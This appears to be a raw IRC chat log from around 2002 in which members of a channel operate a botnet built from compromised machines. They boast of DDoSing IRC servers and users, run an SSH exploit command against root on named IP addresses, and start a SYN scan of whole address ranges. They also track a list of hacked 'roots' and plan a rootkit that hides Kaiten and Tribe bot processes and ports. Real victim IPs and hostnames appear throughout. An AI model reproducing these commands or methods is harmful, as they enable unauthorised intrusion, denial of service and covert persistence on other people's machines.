just get the shitty insta-roots MTrez!mtrez@theprojext.com :;p MTrez!mtrez@theprojext.com :i dont understand that buffer shit MTrez!mtrez@theprojext.com :lol Joar!~toxica@grendel.csc.smith.edu :MTrez: is it okay if I invite a friend inside for a little visit? he is coo MTrez!mtrez@theprojext.com :ehhe, i spose MTrez!mtrez@theprojext.com :as long as he wont kill the bots MTrez!mtrez@theprojext.com :or expect to ddos from em ;p Joar!~toxica@grendel.csc.smith.edu :hehe Joar!~toxica@grendel.csc.smith.edu ::) MTrez!mtrez@theprojext.com :ello Crow-awy!crow@who-is.0nline.no :hey Joar;) Ronn|e!ronnie@lostforever.org :*GOBBLE* ! Joar!~toxica@grendel.csc.smith.edu :hi, Mtrez made the net :p MTrez!mtrez@theprojext.com :ehhe MTrez!mtrez@theprojext.com :cool Crow-awy!crow@who-is.0nline.no :;) MTrez!mtrez@theprojext.com :mtrez + ronnie MTrez!mtrez@theprojext.com :;) Joar!~toxica@grendel.csc.smith.edu :aight :) + ronnie Joar!~toxica@grendel.csc.smith.edu :hehe MTrez!mtrez@theprojext.com :heheh MTrez!mtrez@theprojext.com :rofl Ronn|e!ronnie@lostforever.org :LOLOLOL MTrez!mtrez@theprojext.com :fuckin hell MTrez!mtrez@theprojext.com :who told?!? synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :told yea don;t tell any1 MTrez!mtrez@theprojext.com :fuckin MTrez!mtrez@theprojext.com :all on irc.rt.ru..:eXo-47!root@213.80.36.30 QUIT :Connection closed MTrez!mtrez@theprojext.com :time toddos irc.rt.ru MTrez!mtrez@theprojext.com :hahaha MTrez!mtrez@theprojext.com :quick MTrez!mtrez@theprojext.com :someone help me change all the bots nick Joar!~toxica@grendel.csc.smith.edu :hehe MTrez!mtrez@theprojext.com :shit MTrez!mtrez@theprojext.com :more at the bottom MTrez!mtrez@theprojext.com :i didnt notice MTrez!mtrez@theprojext.com :rofl MTrez!mtrez@theprojext.com :ehhe MTrez!mtrez@theprojext.com :exo-92 is stubborn MTrez!mtrez@theprojext.com :its okay MTrez!mtrez@theprojext.com :leave it MTrez!mtrez@theprojext.com :we can lose 1 MTrez!mtrez@theprojext.com :lol MTrez!mtrez@theprojext.com :fucking ircops MTrez!mtrez@theprojext.com :bastards Joar!~toxica@grendel.csc.smith.edu :hehe MTrez!mtrez@theprojext.com :.ACTION hopes the irc.rt.ru op doesnt notify other ops. MTrez!mtrez@theprojext.com :heheh MTrez!mtrez@theprojext.com :at least it was only a temp kline MTrez!mtrez@theprojext.com :hehe synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :sod that server lol Ronn|e!ronnie@lostforever.org :hrm Ronn|e!ronnie@lostforever.org :whatever was the command MTrez!mtrez@theprojext.com :not bad MTrez!mtrez@theprojext.com :ehheh MTrez!mtrez@theprojext.com :most came back Joar!~toxica@grendel.csc.smith.edu ::) synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ok got to run again gf is finally home synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :l8r MTrez!mtrez@theprojext.com :cya Joar!~toxica@grendel.csc.smith.edu :I think the root ident got the ircops attention Joar!~toxica@grendel.csc.smith.edu :and the nicks synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :NO more fuckups or i kill ya MTrez!mtrez@theprojext.com :yah, likely Joar!~toxica@grendel.csc.smith.edu :mm synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :;P MTrez!mtrez@theprojext.com :bastards were probably watching who connected to their servers MTrez!mtrez@theprojext.com :whores MTrez!mtrez@theprojext.com :hehehe Joar!~toxica@grendel.csc.smith.edu :hehe MTrez!mtrez@theprojext.com :gah MZOVMZA!root@167.206.137.189 JOIN :#exo..: MTrez!mtrez@theprojext.com :fucking assholes Joar!~toxica@grendel.csc.smith.edu :ooo MTrez!mtrez@theprojext.com :all from irc.rt.ru MTrez!mtrez@theprojext.com :wtf is their problem MTrez!mtrez@theprojext.com :heh Joar!~toxica@grendel.csc.smith.edu :you should take that server away from the .c file MTrez!mtrez@theprojext.com :sonofa MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :ehhehe Ronn|e!ronnie@lostforever.org :seems was not enough Ronn|e!ronnie@lostforever.org :hehe MTrez!mtrez@theprojext.com :yeh ;p MTrez!mtrez@theprojext.com :doesnt reply to pings for me anymore Ronn|e!ronnie@lostforever.org :dead now MTrez!mtrez@theprojext.com :yay heheh Joar!~toxica@grendel.csc.smith.edu :irc.rt.ru?? Ronn|e!ronnie@lostforever.org :no haha MTrez!mtrez@theprojext.com :nah, some cable guy i think MTrez!mtrez@theprojext.com :heheh Joar!~toxica@grendel.csc.smith.edu :hehhe, ok Ronn|e!ronnie@lostforever.org :djinsanity Joar!~toxica@grendel.csc.smith.edu :hehe SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :umm..: BQXKFSXW!~GDKB@adsl-66-126-60-242.dsl.sktn01.pacbell.net JOIN :#exo SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :irc.webgiro.se SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :just banned me Joar!~toxica@grendel.csc.smith.edu :serious? Joar!~toxica@grendel.csc.smith.edu :for beeing in here? SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :yes SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :i think so Joar!~toxica@grendel.csc.smith.edu :hmm, maybe we should change channel MTrez!mtrez@theprojext.com :hrm MTrez!mtrez@theprojext.com :what was the ban msg synth? Joar!~toxica@grendel.csc.smith.edu :fucks sakes, yea, I was also banned last night by webgiro! SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :You are banned from this server- drones (2002/08/08 01.52) SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :- SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :Closing Link: synthBBL[sinix@12.30.169.219] (Connection closed)..: SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :- MTrez!mtrez@theprojext.com :hah MTrez!mtrez@theprojext.com :you were joar? SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :some1 is spreading the bans Joar!~toxica@grendel.csc.smith.edu :Ye MTrez!mtrez@theprojext.com :how come u didnt mention anything? Joar!~toxica@grendel.csc.smith.edu :a Joar!~toxica@grendel.csc.smith.edu :I was on webgiro for like 3 weeks, then yestoday night I got banned MTrez!mtrez@theprojext.com :hrm MTrez!mtrez@theprojext.com :alright MTrez!mtrez@theprojext.com :well SynthOUT!sinix@doesnt.care.about.your.personal-opinions.net :i have been on it for months MTrez!mtrez@theprojext.com :for now just everyone part Joar!~toxica@grendel.csc.smith.edu :I never saw the message, Im on bnc MTrez!mtrez@theprojext.com :come in if your on a host you dont mind getting klined Ronn|e!ronnie@lostforever.org :ya MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :im out Ronn|e!ronnie@lostforever.org :ill get a prxy hfue IRC MODE #exo +o rezzie rezzie!loud@65.116.89.149 :heh rezzie!loud@65.116.89.149 :sup rezzie!loud@65.116.89.149 ::) ronnie!~Stargazer@152.94.16.11 :heya ronnie!~Stargazer@152.94.16.11 :hehe rezzie!loud@65.116.89.149 :i banned kim rezzie!loud@65.116.89.149 :just in case they try to ban him rezzie!loud@65.116.89.149 :ehhe ronnie!~Stargazer@152.94.16.11 :ya rezzie!loud@65.116.89.149 :its amazing how many bots are on irc.rt.ru rezzie!loud@65.116.89.149 :i didnt know rezzie!loud@65.116.89.149 :heheh rezzie!loud@65.116.89.149 :they havent dented it rezzie!loud@65.116.89.149 :;p ronnie!~Stargazer@152.94.16.11 :<irc.rt.ru.OP> /topic #e rezzie!loud@65.116.89.149 :? ronnie!~Stargazer@152.94.16.11 :lol ronnie!~Stargazer@152.94.16.11 :j/k rezzie!loud@65.116.89.149 :oh hehe rezzie!loud@65.116.89.149 :i think the bans are over rezzie!loud@65.116.89.149 :finally rezzie!loud@65.116.89.149 :hehe ronnie!~Stargazer@152.94.16.11 :*GOBBLE* ! rezzie!loud@65.116.89.149 :hehe rezzie!loud@65.116.89.149 :yay ronnie!~Stargazer@152.94.16.11 :*GOBBLE!* rezzie!loud@65.116.89.149 :cool rezzie!loud@65.116.89.149 :;) exobad Joar!~toxica@grendel.csc.smith.edu :im clean, Joar!~toxica@grendel.csc.smith.edu ::) rezzie!loud@65.116.89.149 :;) Joar!~toxica@grendel.csc.smith.edu :bots still getting killed? rezzie!loud@65.116.89.149 :nah rezzie!loud@65.116.89.149 :theyre are none left on irc.rt.ru Joar!~toxica@grendel.csc.smith.edu :k, rezzie!loud@65.116.89.149 :heheh Joar!~toxica@grendel.csc.smith.edu ::D rezzie!loud@65.116.89.149 :there we go rezzie!loud@65.116.89.149 :heh Joar!~toxica@grendel.csc.smith.edu :hehe Joar!~toxica@grendel.csc.smith.edu :nice rezzie!loud@65.116.89.149 :rejoin Joar rezzie!loud@65.116.89.149 :lol rezzie!loud@65.116.89.149 :;) Joar!~toxica@grendel.csc.smith.edu :hehe Joar!~toxica@grendel.csc.smith.edu :is there any random nick command, such ass warnicks, if something like that should happen again? ronnie!~Stargazer@152.94.16.11 :don't think so Joar!~toxica@grendel.csc.smith.edu :k, ronnie!~Stargazer@152.94.16.11 :would be cool all of them rotate randomly, such as, each two hours ronnie!~Stargazer@152.94.16.11 :maybe scripted can do it, random chars, and msg everybody in the channel with !NICK NICK NEWNICK command ronnie!~Stargazer@152.94.16.11 :or whatever Joar!~toxica@grendel.csc.smith.edu :yea Joar!~toxica@grendel.csc.smith.edu :it would rock Joar!~toxica@grendel.csc.smith.edu :more secure ronnie!~Stargazer@152.94.16.11 :ya ronnie!~Stargazer@152.94.16.11 :also, if notice : *Drones* *temp* *line* ronnie!~Stargazer@152.94.16.11 :issue the war nick change commands ronnie!~Stargazer@152.94.16.11 :automatically Joar!~toxica@grendel.csc.smith.edu :yea Joar!~toxica@grendel.csc.smith.edu :=) ronnie!~Stargazer@152.94.16.11 :but well that's just an idea, making it is a different thing hehe, i don't know shit about tcl ronnie!~Stargazer@152.94.16.11 :though shouldn't be difficult Joar!~toxica@grendel.csc.smith.edu :I think I should learn tcl, lots of cool stuff that could be done :D ronnie!~Stargazer@152.94.16.11 :look similar to C to me somehow ronnie!~Stargazer@152.94.16.11 :like a mix between c and perl ronnie!~Stargazer@152.94.16.11 :i only know c and asm, and on windows Joar!~toxica@grendel.csc.smith.edu :mm Joar!~toxica@grendel.csc.smith.edu :I prog some java only ronnie!~Stargazer@152.94.16.11 :i see, java is similar to c ronnie!~Stargazer@152.94.16.11 :i see, java is similar to c Joar!~toxica@grendel.csc.smith.edu :I`ve been trying t learn some perl, though I got ubstructed by school and shit Joar!~toxica@grendel.csc.smith.edu :yea ronnie!~Stargazer@152.94.16.11 :you mostly know 50% of the basis of it then Joar!~toxica@grendel.csc.smith.edu :not many hackers search for vulns in java, thats why most BAnks use java as software :) Joar!~toxica@grendel.csc.smith.edu :mm ronnie!~Stargazer@152.94.16.11 :hehe Joar!~toxica@grendel.csc.smith.edu :its true =) Joar!~toxica@grendel.csc.smith.edu :see for yourself =) ronnie!~Stargazer@152.94.16.11 :i like C a lot, though i don't know shit about c++ or ronnie!~Stargazer@152.94.16.11 :objects, classes, etc Joar!~toxica@grendel.csc.smith.edu :mm Joar!~toxica@grendel.csc.smith.edu :its a bit confusing at first, but after a while the peaces fall together =) ronnie!~Stargazer@152.94.16.11 :rezzie, im gonna change the tool in c that kills duplicates ronnie!~Stargazer@152.94.16.11 :gonna make it kill the items that are not open ssh ronnie!~Stargazer@152.94.16.11 :and versions that don't work rezzie!loud@65.116.89.149 :ill do that random stuff in a few moments ronnie!~Stargazer@152.94.16.11 :rezzie ronnie!~Stargazer@152.94.16.11 :check this out ronnie!~Stargazer@152.94.16.11 :one tic rezzie!loud@65.116.89.149 :im thinking about this nick switch thing rezzie!loud@65.116.89.149 :trying to figure out how to do it with the least ammount of spam rezzie!loud@65.116.89.149 :heheh ronnie!~Stargazer@152.94.16.11 :what kind of connection is bdsl btw ? rezzie!loud@65.116.89.149 :no clue rezzie!loud@65.116.89.149 :ehhe no1here!~no1here@152.94.16.11 :oh no its me no1here!~no1here@152.94.16.11 :hehehe no1here!~no1here@152.94.16.11 :intruder muHAHHAHA no1here!~no1here@152.94.16.11 :i rewted scripted rezzie!loud@65.116.89.149 :;p rezzie!loud@65.116.89.149 :whos u? no1here!~no1here@152.94.16.11 :i no wike u rezzie!loud@65.116.89.149 :oh synth rezzie!loud@65.116.89.149 :heh no1here!~no1here@152.94.16.11 :i am rons little biatch ronnie!~Stargazer@152.94.16.11 :lol rezzie!loud@65.116.89.149 :like our little tripwire rezzie!loud@65.116.89.149 :? rezzie!loud@65.116.89.149 :lol no1here!~no1here@152.94.16.11 :yea ahahha rezzie!loud@65.116.89.149 :intruder alert! rezzie!loud@65.116.89.149 :hehe ronnie!~Stargazer@152.94.16.11 :anal intruder ! rezzie!loud@65.116.89.149 :i should make it ban the person if they dont get opped in 5 seconds rezzie!loud@65.116.89.149 :;p ronnie!~Stargazer@152.94.16.11 :rezzie, seen the stuff about the motorbikes ? rezzie!loud@65.116.89.149 :no what? no1here!~no1here@152.94.16.11 :please for the love of all that is fruityrewty stop the klines ronnie!~Stargazer@152.94.16.11 :http://www.b3ta.com/motorbikes/ no1here!~no1here@152.94.16.11 :rezzie u have to see the motorbikes no1here!~no1here@152.94.16.11 :haha i am gonna use that in a email now no1here!~no1here@152.94.16.11 :ROFL no1here!~no1here@152.94.16.11 :to gf's brother ronnie!~Stargazer@152.94.16.11 :he leads a bikers gang ? no1here!~no1here@152.94.16.11 :no he has a couple of bikes rezzie!loud@65.116.89.149 :blah no1here!~no1here@152.94.16.11 :heh nice rezzie!loud@65.116.89.149 :yah, if it worked ;p rezzie!loud@65.116.89.149 :i messed something up no1here!~no1here@152.94.16.11 :h no1here!~no1here@152.94.16.11 :a no1here!~no1here@152.94.16.11 :o o t t a h c y m g n i t p y n e m a I rezzie!loud@65.116.89.149 :hahaha no1here!~no1here@152.94.16.11 :haha stewpid bawt rezzie!loud@65.116.89.149 :shuttup rezzie!loud@65.116.89.149 :;p no1here!~no1here@152.94.16.11 :AHAHHAH rezzie!loud@65.116.89.149 :oh my god rezzie!loud@65.116.89.149 :heh ezzie!loud@65.116.89.149 :i dont think it will stop ol8huTaut!~no1here@152.94.16.11 :christ ronnie!~Stargazer@152.94.16.11 :rezzie, i think those bots worked via msg too ol8huTaut!~no1here@152.94.16.11 :make it stop ronnie!~Stargazer@152.94.16.11 :might be better to just msg them the command rezzie!loud@65.116.89.149 :nah rezzie!loud@65.116.89.149 :kaiten doesnt accept msg rezzie!loud@65.116.89.149 :heh ronnie!~Stargazer@152.94.16.11 :or scripted will get flooed out ronnie!~Stargazer@152.94.16.11 :i see no1here!~no1here@152.94.16.11 :wtf was that btw no1here!~no1here@152.94.16.11 :nice rezzie!loud@65.116.89.149 :nvm rezzie!loud@65.116.89.149 :just testing something rezzie!loud@65.116.89.149 :shh u rezzie!loud@65.116.89.149 :heh rezzie!loud@65.116.89.149 :nicks cant begin with a number no1here!~no1here@152.94.16.11 :<@rezzie> nvm ni rezzie!loud@65.116.89.149 :so i need to filter out random strings with a number starting them rezzie!loud@65.116.89.149 :sec rezzie!loud@65.116.89.149 :still uses number nicks rezzie!loud@65.116.89.149 :god damn it no1here!~no1here@152.94.16.11 :ahha no1here!~no1here@152.94.16.11 :christ rezzie!loud@65.116.89.149 :o i c why no1here!~no1here@152.94.16.11 :k bbl rezzie!loud@65.116.89.149 :cya no1here!~no1here@152.94.16.11 :gf is home again no1here!~no1here@152.94.16.11 :ehhe ronnie!~Stargazer@152.94.16.11 :give her cock ! no1here!~no1here@152.94.16.11 :na tommorow no1here!~no1here@152.94.16.11 :she is too tired no1here!~no1here@152.94.16.11 :she worked double shifts ronnie!~Stargazer@152.94.16.11 :ic no1here!~no1here@152.94.16.11 :i will be back soon to annoy u 2 ;) ronnie!~Stargazer@152.94.16.11 :i don't want your cock ! ronnie!~Stargazer@152.94.16.11 :lol rezzie!loud@65.116.89.149 :heh, nice one ronnie!~Stargazer@152.94.16.11 :ya, i fucked it up ronnie!~Stargazer@152.94.16.11 :lol ronnie!~Stargazer@152.94.16.11 :check priv msg mate ronnie!~Stargazer@152.94.16.11 :fucking hell ronnie!~Stargazer@152.94.16.11 :<O_6> h r0nn13!~Stargazer@152.94.16.11 :god, back now lol rezzie!loud@65.116.89.149 :hehe rezzie!loud@65.116.89.149 :bb in a bit r0nn13!~Stargazer@152.94.16.11 :what are you doing r0nn13!~Stargazer@152.94.16.11 :lol r0nn13!~Stargazer@152.94.16.11 :207.174.228 no1here!~no1here@152.94.16.11 :AHHAH no1here!~no1here@152.94.16.11 :doh no1here!~no1here@152.94.16.11 :jesus no1here!~no1here@152.94.16.11 :what an idiot r0nn13!~Stargazer@152.94.16.11 :i did that the same r0nn13!~Stargazer@152.94.16.11 :some mins ago r0nn13!~Stargazer@152.94.16.11 :try 207.174.228.252 r0nn13!~Stargazer@152.94.16.11 :that's the right person r0nn13!~Stargazer@152.94.16.11 :lol no1here!~no1here@152.94.16.11 :i was doing your dirty work lol no1here!~no1here@152.94.16.11 :hahaha jebus r0nn13!~Stargazer@152.94.16.11 :haha no1here!~no1here@152.94.16.11 :kinda a good idea though no1here!~no1here@152.94.16.11 :packs just pile up on top of each other r0nn13!~Stargazer@152.94.16.11 :enough r0nn13!~Stargazer@152.94.16.11 :lol..: r0nn13!~Stargazer@152.94.16.11 :its dead no1here!~no1here@152.94.16.11 :doesn;t seem to be r0nn13!~Stargazer@152.94.16.11 :Ping statistics for 24.51.87.99: r0nn13!~Stargazer@152.94.16.11 : Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), no1here!~no1here@152.94.16.11 :oh how do u do that? r0nn13!~Stargazer@152.94.16.11 :oh on dos no1here!~no1here@152.94.16.11 :hrmm no1here!~no1here@152.94.16.11 :should remember not to !* killall with that too r0nn13!~Stargazer@152.94.16.11 :right no1here!~no1here@152.94.16.11 :kill each letter separtly too r0nn13!~Stargazer@152.94.16.11 :ya no1here!~no1here@152.94.16.11 :<--idio no1here!~no1here@152.94.16.11 :hrmm nick won;t die though r0nn13!~Stargazer@152.94.16.11 :prolly the ircd has a long ping time r0nn13!~Stargazer@152.94.16.11 :or is he talking ? no1here!~no1here@152.94.16.11 :lightning.net no1here!~no1here@152.94.16.11 :no talking no1here!~no1here@152.94.16.11 :just idle atm r0nn13!~Stargazer@152.94.16.11 :no doubt r0nn13!~Stargazer@152.94.16.11 :hahahahha no1here!~no1here@152.94.16.11 :god damn it bing out no1here!~no1here@152.94.16.11 :jebus i am gonna have to sod it again christ wEwLtKMZm!~KREFS@h75n3fls21o1067.telia.com NICK :feJm42ns6..:no1here!~no1here@152.94.16.11 :it won't die no1here!~no1here@152.94.16.11 :hahah no1here!~no1here@152.94.16.11 :u pulling out all the skillz? no1here!~no1here@152.94.16.11 :fuck i think he is only cable but it won;t die no1here!~no1here@152.94.16.11 :those ops are gonna msg u again ROFL r0nn13!~Stargazer@152.94.16.11 :give it a bit now no1here!~no1here@152.94.16.11 :sir can we help u? r0nn13!~Stargazer@152.94.16.11 :nah r0nn13!~Stargazer@152.94.16.11 :lol no1here!~no1here@152.94.16.11 :u are being msg flooded? no1here!~no1here@152.94.16.11 :who is doing this to u? r0nn13!~Stargazer@152.94.16.11 :hahahahhahaaha r0nn13!~Stargazer@152.94.16.11 :he pinged out ? no1here!~no1here@152.94.16.11 :yea no1here!~no1here@152.94.16.11 :*** sATAN|K (baal@ny-amherst2a-355.buf.adelphia.net) Quit (Read error: 54 (Connection reset by peer)) no1here!~no1here@152.94.16.11 :ehheh no1here!~no1here@152.94.16.11 :what letters did u use? r0nn13!~Stargazer@152.94.16.11 :dunno random ones no1here!~no1here@152.94.16.11 :HAHAH no1here!~no1here@152.94.16.11 :hit up button and put kill all command instead r0nn13!~Stargazer@152.94.16.11 :it ended already no1here!~no1here@152.94.16.11 :.ACTION starts to snicker. r0nn13!~Stargazer@152.94.16.11 :its ok no1here!~no1here@152.94.16.11 :k no1here!~no1here@152.94.16.11 :took alot eh SUZZFUZZ NICK dg34gerfg no1here!~no1here@152.94.16.11 :omg no1here!~no1here@152.94.16.11 :edu!!!!!!!!!!!!!!!! no1here!~no1here@152.94.16.11 :edu_OWNZ!!! r0nn13!~Stargazer@152.94.16.11 :hehe r0nn13!~Stargazer@152.94.16.11 :nite no1here!~no1here@152.94.16.11 :nite ron no1here!~no1here@152.94.16.11 :heheh that guy still has not returned online no1here!~no1here@152.94.16.11 :HEHEHEH no1here!~no1here@152.94.16.11 :face it u cannot stop no1here!~no1here@152.94.16.11 :oh u bad bad man rezzie!loud@65.116.89.149 :;) no1here!~no1here@152.94.16.11 :well i am off to bed no1here!~no1here@152.94.16.11 :nitez JHPSHB!~RFGHJFJ@most.wanted.terrori.st :lol. JHPSHB!~RFGHJFJ@most.wanted.terrori.st :nice JHPSHB!~RFGHJFJ@most.wanted.terrori.st :nice JHPSHB!~RFGHJFJ@most.wanted.terrori.st :=) r0nn13!~Stargazer@152.94.16.11 :morning r0nn13!~Stargazer@152.94.16.11 :lo, JHPSHB r0nn13!~Stargazer@152.94.16.11 :damn, fucking rt.ru klining again r0nn13!~Stargazer@152.94.16.11 :fucking assholes r0nn13!~Stargazer@152.94.16.11 :they need a hobby scripted!~scripted@207.104.94.181 :.4INTRUDER!. ->> .scripted. (.~scripted@207.104.94.181.) scripted!~scripted@207.104.94.181 :.4INTRUDER!. ->> .Joar. (.~toxica@grendel.csc.smith.edu.) r0nn13!~Stargazer@152.94.16.11 :it stopped replying commands to me JHPSHB!~RFGHJFJ@most.wanted.terrori.st :same here r0nn13!~Stargazer@152.94.16.11 :okay cool r0nn13!~Stargazer@152.94.16.11 :*GOBBLE!* r0nn13!~Stargazer@152.94.16.11 :rezzie ? r0nn13!~Stargazer@152.94.16.11 :./ssh -l root 66.25.212.204 -M bsdauth -S skey -j 256 -d 1550 r0nn13!~Stargazer@152.94.16.11 :yay ! r0nn13!~Stargazer@152.94.16.11 :*GOBBLE!* r0nn13!~Stargazer@152.94.16.11 :./ssh -l root 66.27.81.186 -M bsdauth -S skey -j 4096 -d 3050 r0nn13!~Stargazer@152.94.16.11 :*GOBBLE!* r0nn13!~Stargazer@152.94.16.11 :*GOBBLE!* r0nn13!~Stargazer@152.94.16.11 :./ssh -l root 66.57.64.19 -M bsdauth -S skey -j 4096 -d 3050 nn13!~Stargazer@152.94.16.11 :hi rezzie rezzie!loud@63.145.151.251 :hey r0nn13!~Stargazer@152.94.16.11 :a shitload got klined r0nn13!~Stargazer@152.94.16.11 :+ r0nn13!~Stargazer@152.94.16.11 :i did a few new ones rezzie!loud@63.145.151.251 :yah, i noticed they klined my bot as well rezzie!loud@63.145.151.251 :heh rezzie!loud@63.145.151.251 :this is begining to piss me off scripted0!rezzie@207.104.94.181 :.4INTRUDER!. ->> .scripted0. (.rezzie@207.104.94.181.) rezzie!loud@63.145.151.251 :heh scripted0!rezzie@207.104.94.181 :There are 76 alive hosts out of 140 total hosts. %54 capacity. no1here!~no1here@152.94.16.11 :heh no1here!~no1here@152.94.16.11 :still adding more? rezzie!loud@63.145.151.251 :ehhe yah rezzie!loud@63.145.151.251 :194.* got scanned rezzie!loud@63.145.151.251 :at least half way anyway no1here!~no1here@152.94.16.11 :how many u up to? rezzie!loud@63.145.151.251 :i think the scanner crashed rezzie!loud@63.145.151.251 :at 194.150ish rezzie!loud@63.145.151.251 :141 roots aint bad considering theres still ones with no bots on them rezzie!loud@63.145.151.251 :so theres more no1here!~no1here@152.94.16.11 :so scanner pulled a rez hrmp no1here!~no1here@152.94.16.11 :oh rezzie!loud@63.145.151.251 :152 in my list no1here!~no1here@152.94.16.11 :jesus no1here!~no1here@152.94.16.11 :is that the bash kiing one? no1here!~no1here@152.94.16.11 :the rr rezzie!loud@63.145.151.251 :ehhhe rezzie!loud@63.145.151.251 :nah rezzie!loud@63.145.151.251 :theres a ton of rr ones ithink rezzie!loud@63.145.151.251 :sc-66-75-96-192.socal.rr.com rezzie!loud@63.145.151.251 :actually that may be it rezzie!loud@63.145.151.251 :ehhe rezzie!loud@63.145.151.251 :clone mania from that one rezzie!loud@63.145.151.251 :hahh rezzie!loud@63.145.151.251 :ATTACK OF THE CLONES! r0nn13!~Stargazer@152.94.16.11 :i killed another r0nn13!~Stargazer@152.94.16.11 :or what i did r0nn13!~Stargazer@152.94.16.11 :lol rezzie!loud@63.145.151.251 :lol no1here!~no1here@152.94.16.11 :hehhe christ rezzie!loud@63.145.151.251 :you know rezzie!loud@63.145.151.251 :before we take these bots off efnet rezzie!loud@63.145.151.251 :its our duty rezzie!loud@63.145.151.251 :to mmsg every ircop rezzie!loud@63.145.151.251 :on irc.rt.ru no1here!~no1here@152.94.16.11 :HAHHAH rezzie!loud@63.145.151.251 :more clones rezzie!loud@63.145.151.251 :;p no1here!~no1here@152.94.16.11 :jesus no1here!~no1here@152.94.16.11 :op no1here!~no1here@152.94.16.11 :some1 caught u rezzie!loud@63.145.151.251 :alright rezzie!loud@63.145.151.251 :friend is gonna set me up the rootkit rezzie!loud@63.145.151.251 :just got in contact with him rezzie!loud@63.145.151.251 :but since its like the only rootkit that exists for openbsd rezzie!loud@63.145.151.251 :its not that great rezzie!loud@63.145.151.251 :hehe no1here!~no1here@152.94.16.11 :rootkit is what? rezzie!loud@63.145.151.251 :the procs it hides are hardcoded no1here!~no1here@152.94.16.11 :patcher? rezzie!loud@63.145.151.251 :rootkit = patches the root exploit, and gives us a backdoor for life rezzie!loud@63.145.151.251 :so nobody else can hax the box no1here!~no1here@152.94.16.11 :HAHAHAH rezzie!loud@63.145.151.251 :now rezzie!loud@63.145.151.251 :as for the procs i want hidden rezzie!loud@63.145.151.251 :im not using these rezzie!loud@63.145.151.251 :but i assume this will be enough rezzie!loud@63.145.151.251 :td,tc,tcc,kash,bt1,bt1,kmsc rezzie!loud@63.145.151.251 :td for the tribe demon, tc for tribe client, tcc for tribe client spawns, kash for kaiten (if we want, bt1 for bot one if we install egg, bt2 for bot2 if we install a 2nd, and kmsc for whatever rezzie!loud@63.145.151.251 :actually ill change kash and kmsc to something a little more obscure rezzie!loud@63.145.151.251 :alsoi need to decide what ports/ips should be hidden no1here!~no1here@152.94.16.11 :make it some really odd ports that stuff runs on no1here!~no1here@152.94.16.11 :so nothing conflicts rezzie!loud@63.145.151.251 :16837, 24183, 38932, 48389, 51837, 61069, 63994, 54827, 43787, 34992, 29313, 12998 rezzie!loud@63.145.151.251 :ehhe rezzie!loud@63.145.151.251 :as for ips rezzie!loud@63.145.151.251 :well rezzie!loud@63.145.151.251 :not sure what to do there rezzie!loud@63.145.151.251 :id rather not define anything at all no1here!~no1here@152.94.16.11 :yea..:rezzie!loud@63.145.151.251 :in the event that info gets found no1here!~no1here@152.94.16.11 :don;t put anything rezzie!loud@63.145.151.251 :okay rezzie!loud@63.145.151.251 :and what utils should automaticly be installed rezzie!loud@63.145.151.251 :wget rezzie!loud@63.145.151.251 :obviously rezzie!loud@63.145.151.251 :hah rezzie!loud@63.145.151.251 :i wonder r0nn13!~Stargazer@152.94.16.11 :i wooo ooo ooo n der no1here!~no1here@152.94.16.11 :bbl rezzie!loud@63.145.151.251 :cya rezzie!loud@63.145.151.251 :[root@ns1 synscan]# ./synscan iplist out44 eth0 100 22 -u rezzie!loud@63.145.151.251 :okie rezzie!loud@63.145.151.251 :scan started on 200.* rezzie!loud@63.145.151.251 :looks like a very active range r0nn13!~Stargazer@152.94.16.11 :greatr rezzie!loud@63.145.151.251 :is that .nl box back up yet? rezzie!loud@63.145.151.251 :that was a far better scanning box r0nn13!~Stargazer@152.94.16.11 :the www one ? r0nn13!~Stargazer@152.94.16.11 :or im confused ? rezzie!loud@63.145.151.251 :this is gonna be a long list rezzie!loud@63.145.151.251 :;) rezzie!loud@63.145.151.251 :i think most are up, simply cant get on irc r0nn13!~Stargazer@152.94.16.11 :shouldn't kill the ones that don't connect anymore, mtrez ? r0nn13!~Stargazer@152.94.16.11 :the entries, i mean rezzie!loud@63.145.151.251 :not sure rezzie!loud@63.145.151.251 :hehe r0nn13!~Stargazer@152.94.16.11 :1) rdu57-250-138.nc.rr.com 66.57.250.138 ---> no connection rezzie!loud@63.145.151.251 :is dead? r0nn13!~Stargazer@152.94.16.11 :2) cecilia.thn.htu.se 193.10.236.150 --> no connection r0nn13!~Stargazer@152.94.16.11 :yes rezzie!loud@63.145.151.251 :well rezzie!loud@63.145.151.251 :it is cable after all rezzie!loud@63.145.151.251 :probably not 24/7 rezzie!loud@63.145.151.251 :ehhe rezzie!loud@63.145.151.251 :ill go through the entire rootlist in a little bit rezzie!loud@63.145.151.251 :and start making note of those who dont respond rezzie!loud@63.145.151.251 :to try again tommorow rezzie!loud@63.145.151.251 :if they dont respond a few days in a row rezzie!loud@63.145.151.251 :ill note em as dead n gone r0nn13!~Stargazer@152.94.16.11 :3) s1.andronet.nu 213.80.36.30 --> up, bot running, bot not on irc r0nn13!~Stargazer@152.94.16.11 :maybe the bot crashed ? should i try to restart it ? rezzie!loud@63.145.151.251 :yah, thats possible rezzie!loud@63.145.151.251 :go ahead r0nn13!~Stargazer@152.94.16.11 :done r0nn13!~Stargazer@152.94.16.11 :4) dsl-kl-207-34-65-70-cgy.nucleus.com 207.34.65.70 ---> been secured, and skey/bsdauth removed rezzie!loud@63.145.151.251 :hrm rezzie!loud@63.145.151.251 :damn rezzie!loud@63.145.151.251 :hehe r0nn13!~Stargazer@152.94.16.11 :5) adsl-66-72-117-48.dsl.chcgil.ameritech.net 66.72.117.48 ---> dead rezzie!loud@63.145.151.251 :k, writing this down r0nn13!~Stargazer@152.94.16.11 :6) 